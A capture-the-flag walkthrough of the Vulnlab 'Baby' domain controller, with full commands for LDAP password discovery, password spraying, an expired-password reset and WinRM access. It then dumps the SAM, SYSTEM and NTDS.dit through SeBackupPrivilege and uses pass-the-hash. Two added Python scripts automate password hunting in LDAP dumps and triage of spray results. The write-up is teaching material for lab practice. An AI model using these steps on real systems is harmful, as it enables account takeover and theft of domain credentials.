Vulnlab - Baby


In this walkthrough we will be going through the Baby machine from Vulnlab. It is rated Easy on the platform and consists of extensive LDAP enumeration to find a candidate password. Spraying that password returns a STATUS_PASSWORD_MUST_CHANGE error for one account, which has to be abused (by resetting the expired password) to get the initial foothold. For privilege escalation, SeBackupPrivilege is abused to dump the domain hashes and get root. So, let's get started without any delay.


Machine Info:

Title: Baby
IP address: 10.10.88.179
Difficulty: Easy
OS: Windows
Description: Baby is an Easy Windows machine that requires extensive LDAP enumeration to find a candidate password. Spraying it reveals a STATUS_PASSWORD_MUST_CHANGE error that has to be abused to get the initial foothold. For privilege escalation, abuse of SeBackupPrivilege is required to get root.

Enumeration:

  • I started off with a regular nmap scan, followed by an all-TCP-port scan and a UDP scan. Found multiple ports open: 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389/636/3268/3269 (LDAP and Global Catalog), 3389 (RDP), 5985 (WinRM), 9389 (ADWS) and more. Together with the rdp-ntlm-info output (domain baby.vl, host BabyDC.baby.vl) this identifies the target as a domain controller.

$ sudo nmap -sV -sC 10.10.88.179
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-20 23:50 IST

Nmap scan report for 10.10.88.179
Host is up (0.25s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-04-20 18:21:39Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: BABY
|   NetBIOS_Domain_Name: BABY
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: baby.vl
|   DNS_Computer_Name: BabyDC.baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-04-20T18:21:49+00:00
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2024-04-19T18:19:35
|_Not valid after:  2024-10-19T18:19:35
|_ssl-date: 2024-04-20T18:22:28+00:00; -1s from scanner time.
5357/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-04-20T18:21:50
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 220.16 seconds

$ sudo nmap -p- -T5 10.10.88.179
[sudo] password for wh1terose: 
Sorry, try again.
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-20 23:51 IST

Nmap scan report for 10.10.88.179
Host is up (0.17s latency).
Not shown: 65515 filtered ports
PORT      STATE SERVICE
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5357/tcp  open  wsdapi
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
58870/tcp open  unknown
58959/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 320.17 seconds

$ sudo nmap -sU -T5 10.10.88.179
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-20 23:51 IST

Nmap scan report for 10.10.88.179
Host is up (0.17s latency).
Not shown: 998 open|filtered ports
PORT    STATE SERVICE
123/udp open  ntp
389/udp open  ldap

Nmap done: 1 IP address (1 host up) scanned in 66.98 seconds

  • Added the hostnames from the nmap output (baby.vl and BabyDC.baby.vl) to my /etc/hosts file.

adding hostname to /etc/hosts

PORT 135 (RPC)

  • Tried to enumerate usernames over RPC with rpcclient using a null session, but got nothing.

RPC Enumeration

PORT 139/445 (SMB)

  • Tried to list shares via null-session authentication, but got nothing.

SMB Enumeration

PORT 389 (LDAP)

  • Tried an anonymous bind on LDAP. It succeeded, and I dumped the list of user accounts in the domain.

ldapsearch -H ldap://10.10.88.179 -x -b "DC=baby,DC=vl" '(objectClass=User)' "sAMAccountName" | grep sAMAccountName

LDAP Enumeration

AS-REP roasting

  • With the found usernames, I tried AS-REP roasting to check whether any of them has Kerberos pre-authentication disabled, but had no luck.

AsREP Roasting

  • Next, dumped every attribute of every object via LDAP. Found a password in the description attribute of the user Teresa Bell.

ldapsearch -x -b "DC=baby,DC=vl" -H ldap://10.10.88.179 "*"

Got password of Teresa Bell
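The two ldapsearch dumps above are read by eye in the walkthrough. The following is an added example, not part of the original post: a small Python parser for ldapsearch's LDIF output that unfolds continuation lines, decodes base64-encoded (`attr::`) values, lists every sAMAccountName returned, and flags description values that contain a password-like token. The LDIF sample inside it is constructed for the example (the description texts, the Jane.Doe account and the OU names are invented); all the page tells us about Teresa.Bell's real description is that it contains BabyStart123!.

```python
import base64
import re

# Constructed sample of ldapsearch LDIF output for three user objects (NOT the real dump
# from the box). It exercises the two LDIF quirks a parser must handle: a value folded
# across lines (the continuation line starts with one space, removed on unfold) and a
# value ldapsearch base64-encodes because it contains non-ASCII ("description:: ...").
SAMPLE_LDIF = (
    "# Teresa Bell, it, baby.vl\n"
    "dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl\n"
    "objectClass: user\n"
    "sAMAccountName: Teresa.Bell\n"
    "description: Initial password is BabyStar\n"
    " t123!\n"
    "\n"
    "# Jane Doe, dev, baby.vl\n"
    "dn: CN=Jane Doe,OU=dev,DC=baby,DC=vl\n"
    "objectClass: user\n"
    "sAMAccountName: Jane.Doe\n"
    "description:: "
    + base64.b64encode("Passwort: Sommer2024! (für den Urlaub)".encode()).decode()
    + "\n"
    "\n"
    "# Caroline Robinson, it, baby.vl\n"
    "dn: CN=Caroline Robinson,OU=it,DC=baby,DC=vl\n"
    "objectClass: user\n"
    "sAMAccountName: Caroline.Robinson\n"
)

# Words that suggest a description is talking about credentials at all.
PASSWORD_HINT = re.compile(r"pass|pwd|cred|login", re.IGNORECASE)


def parse_ldif(text):
    """Return a list of entries, each a dict of lowercased attribute -> list of values."""
    entries, current = [], {}
    # Unfold first: RFC 2849 folds long values by breaking the line and starting the
    # next one with a single space, which is removed when joining.
    for line in text.replace("\n ", "").splitlines():
        if not line.strip():            # a blank line terminates the entry
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):        # ldapsearch prints the friendly DN as a comment
            continue
        name, _, value = line.partition(":")
        if value.startswith(":"):       # "attr:: <base64>" form for non-safe values
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        current.setdefault(name.lower(), []).append(value)
    if current:
        entries.append(current)
    return entries


def account_names(entries):
    """Every sAMAccountName in the dump, in the order the server returned them."""
    return [e["samaccountname"][0] for e in entries if "samaccountname" in e]


def looks_like_password(token):
    """Crude complexity check: at least three of the four character classes."""
    classes = [r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]"]
    return sum(1 for c in classes if re.search(c, token)) >= 3


def candidate_passwords(entries):
    """Map sAMAccountName -> tokens in its description that look like passwords."""
    hits = {}
    for entry in entries:
        if "description" not in entry or "samaccountname" not in entry:
            continue
        description = " ".join(entry["description"])
        if not PASSWORD_HINT.search(description):
            continue
        tokens = [t.strip(":;,.()") for t in description.split()]
        found = [t for t in tokens if len(t) >= 8 and looks_like_password(t)]
        if found:
            hits[entry["samaccountname"][0]] = found
    return hits


if __name__ == "__main__":
    parsed = parse_ldif(SAMPLE_LDIF)
    print("accounts:", account_names(parsed))
    for user, tokens in candidate_passwords(parsed).items():
        print(f"{user}: {tokens}")
```

Feed it the saved output of `ldapsearch -x -LLL -H ldap://10.10.88.179 -b "DC=baby,DC=vl"` instead of the sample to get the same two lists for the real domain; the account list is what the spray uses, and the flagged tokens are what gets sprayed.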

  • To check whether the password is valid, and for which user, I sprayed it against the DC with crackmapexec, but got 0 successful hits. (In an interactive bash session, quote the password: an unquoted "!" triggers history expansion.)

crackmapexec smb 10.10.88.179 -u usernames -p BabyStart123! --continue-on-success

crackmapexec password spray

  • Back to enumeration: looking at the LDAP result again, I found that there are more users in the domain than my first query had captured. Grepping for "#" lists the per-entry comment lines ldapsearch prints (the friendly form of each DN), which gives every object the server returned.

ldapsearch -x -b "DC=baby,DC=vl" -H ldap://10.10.88.179 "*" | grep "#"

LDAP Enumeration

  • I sprayed the password again against the extended username list. Still no green flag, but for the user "Caroline.Robinson" the DC returned STATUS_PASSWORD_MUST_CHANGE instead of STATUS_LOGON_FAILURE: the password is correct, the account is just flagged to change it at next logon.

crackmapexec spray
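The spray results in the two crackmapexec runs above are interpreted by eye. As an added example (not from the original post), here is a Python triage of crackmapexec/netexec SMB spray output that separates the NT status codes that matter: STATUS_PASSWORD_MUST_CHANGE and STATUS_PASSWORD_EXPIRED mean the password is right and the account needs a reset, STATUS_ACCOUNT_LOCKED_OUT and STATUS_ACCOUNT_DISABLED mean stop spraying that user, and everything else is treated as a plain failure. The sample output is constructed; the accounts other than Caroline.Robinson and Teresa.Bell, and the host banner, are invented.

```python
import re

# Constructed crackmapexec/netexec SMB spray output (NOT the real run from the box).
# John.Smith, Jane.Doe and svc_backup are invented accounts.
SAMPLE_SPRAY = """\
SMB  10.10.88.179  445  BABYDC  [*] Windows 10.0 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB  10.10.88.179  445  BABYDC  [-] baby.vl\\John.Smith:BabyStart123! STATUS_LOGON_FAILURE
SMB  10.10.88.179  445  BABYDC  [-] baby.vl\\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
SMB  10.10.88.179  445  BABYDC  [-] baby.vl\\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
SMB  10.10.88.179  445  BABYDC  [-] baby.vl\\Jane.Doe:BabyStart123! STATUS_ACCOUNT_LOCKED_OUT
SMB  10.10.88.179  445  BABYDC  [+] baby.vl\\svc_backup:BabyStart123! (Pwn3d!)
"""

# One result line: "[+]" or "[-]", domain\user:password, optional NT status code.
RESULT = re.compile(
    r"\[(?P<mark>[+-])\]\s+"
    r"(?P<domain>[^\\\s]+)\\(?P<user>[^:\s]+):(?P<password>\S+)"
    r"(?:\s+(?P<status>STATUS_[A-Z_]+))?"
)

# The password is correct but the account cannot log on until it is changed:
# this is the foothold case from the walkthrough.
PASSWORD_OK_NEEDS_CHANGE = {"STATUS_PASSWORD_MUST_CHANGE", "STATUS_PASSWORD_EXPIRED"}

# Account-state errors: further attempts against these users are pointless, and a
# lockout means the spray is hitting the domain lockout threshold.
STOP_SPRAYING = {"STATUS_ACCOUNT_LOCKED_OUT", "STATUS_ACCOUNT_DISABLED"}


def triage_spray(output):
    """Bucket every result line by what the status code tells us about the account."""
    buckets = {"valid": [], "must_change": [], "stop": [], "failed": []}
    for line in output.splitlines():
        m = RESULT.search(line)
        if not m:
            continue                    # banners and other non-result lines
        user, status = m["user"], m["status"]
        if m["mark"] == "+":
            buckets["valid"].append(user)
        elif status in PASSWORD_OK_NEEDS_CHANGE:
            buckets["must_change"].append(user)
        elif status in STOP_SPRAYING:
            buckets["stop"].append(user)
        else:
            buckets["failed"].append(user)
    return buckets


def reset_commands(buckets, host):
    """For each must-change account, the smbpasswd invocation that changes the password
    over SAMR using only the old (expired) password, as done later in the walkthrough."""
    return [f"smbpasswd -r {host} -U {user}" for user in buckets["must_change"]]


if __name__ == "__main__":
    result = triage_spray(SAMPLE_SPRAY)
    for bucket, users in result.items():
        print(f"{bucket:12s} {users}")
    for cmd in reset_commands(result, "10.10.88.179"):
        print("next step:", cmd)
```

Pipe the real crackmapexec output into `triage_spray` and anything in the "stop" bucket is a reason to pause: a STATUS_ACCOUNT_LOCKED_OUT during a single-password spray means the lockout threshold is lower than assumed.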

PORT 5357 (HTTP)

  • Next, looked at the web server on port 5357, but the index page returns a Service Unavailable error; per the nmap output this is the WSDAPI (Web Services for Devices) HTTP listener, not a real web application.

Service Unavailable error

Exploitation:

  • The SMB spray returned a "STATUS_PASSWORD_MUST_CHANGE" error for Caroline.Robinson. Looking this up, there are several ways to change an expired password remotely; one is over RDP, where the Windows logon screen offers the change-password dialog, and the nmap rdp-enum-encryption script shows which security layers (native RDP, TLS, CredSSP/NLA) the server accepts. I checked RDP with that script first.

Resource: https://www.n00py.io/2021/09/resetting-expired-passwords-remotely/

sudo nmap 10.10.88.179 -p 3389 --script rdp-enum-encryption

nmap script scan

  • I tried to RDP into the server with rdesktop, but the session failed. So I moved on to another technique from the same article that uses smbpasswd: it performs the change over SMB/SAMR and only needs the old (expired) password.

smbpasswd -r 10.10.88.179 -U Caroline.Robinson

Old SMB password:BabyStart123!
New SMB password:Password@123!
Retype new SMB password: Password@123!

Password changed for user Caroline.Robinson

Changing password of user Caroline.Robinson

  • Changed Caroline's password with the above technique and confirmed it with crackmapexec. Got a green flag now. Note that this is a destructive change: on a real engagement, resetting a user's password is visible to that user and should be covered by the rules of engagement, so record the old and new values.

crackmapexec smb 10.10.88.179 -u Caroline.Robinson -p "Password@123!"

Got a green flag

  • Next, tested the creds against the WinRM service, and crackmapexec returned "Pwn3d!", meaning the user is allowed a remote PowerShell session on the DC.

crackmapexec winrm 10.10.88.179 -u Caroline.Robinson -p "Password@123!"

got Pwn3d

  • Got a shell via Evil-WinRM and captured the user flag.

user flag

Privilege Escalation:

  • I ran the command below to check the groups and privileges assigned to the current user. Found an interesting entry: the SeBackupPrivilege privilege and membership in the Backup Operators group.

whoami /all


  • SeBackupPrivilege lets its holder read any file or registry hive regardless of ACLs when backup semantics are used, so reg save works on protected hives. Using it, I saved the SAM and SYSTEM hives to my current directory and downloaded both to my local machine.

reg save hklm\sam C:\Users\Caroline.Robinson\Desktop\sam

reg save hklm\system C:\Users\Caroline.Robinson\Desktop\system

copied the SAM and SYSTEM files

  • Used secretsdump on the downloaded hives to dump the hashes stored in them, revealing the local Administrator's hash.

secretsdump.py -sam sam -system system LOCAL

using secretsdump to dump hashes

  • Next, I tried to log into the DC with the Administrator hash via pass-the-hash with psexec, but it failed. That is expected: on a domain controller the local SAM does not hold the domain accounts, and the Administrator in it is the Directory Services Restore Mode (DSRM) account, so this hash is a local admin's and not the domain Administrator's.

logging as an Administrator but failed

  • So, to dump the domain hashes we need the NTDS.dit file, which is locked while the DC is running. We take a Volume Shadow Copy of the C: drive with diskshadow and copy the file out of it with robocopy in backup mode, which uses SeBackupPrivilege to bypass the file ACL.

# Write the diskshadow script; run this from C:\temp, which is where it is read from below

echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append

  • Once the script is written, run the diskshadow utility with it to create the shadow copy and expose it as drive Z:.

diskshadow.exe /s c:\temp\diskshadow.txt

  • Next, copy NTDS.dit out of the exposed shadow copy on Z: with robocopy in backup mode (/b), which is the step that actually uses SeBackupPrivilege.

cd Z:
cd windows
cd ntds
robocopy /b .\ C:\temp NTDS.dit

  • Save the SYSTEM hive as well; its boot key is needed to decrypt the hashes in NTDS.dit.

cd C:\Temp
reg.exe save hklm\system C:\temp\system.bak

  • Download system.bak and NTDS.dit to the local machine and use secretsdump to extract the hashes. When done, remove the exposed shadow copy on the DC (diskshadow's "unexpose z:" and "delete shadows all") so a readable copy of the DC's disk is not left behind.

secretsdump.py -ntds ntds.dit -system system.bak LOCAL

secretsdump hash dump

  • Finally, logged into the DC with the domain Administrator hash via pass-the-hash and captured the root flag to mark the machine as complete.

evil-winrm.rb -i 10.10.88.179 -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d

root flag


Conclusion:


So that was “Baby” for you. We started off with a regular nmap scan and found multiple ports open: 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP) and many more, identifying the host as a domain controller. Next, we dumped all user information via an anonymous LDAP bind and found a password in the description of the user Teresa Bell. Spraying it against the usernames from the LDAP enumeration produced a STATUS_PASSWORD_MUST_CHANGE error for Caroline.Robinson; we abused that by changing her expired password with smbpasswd and got the initial foothold over WinRM. For privilege escalation, SeBackupPrivilege was abused to copy NTDS.dit out of a shadow copy along with the SYSTEM hive, and secretsdump turned those into the domain hashes. At last, the dumped domain Administrator hash was used to get root. On that note, I will take your leave and meet you in the next one. Till then, “Happy hacking”.
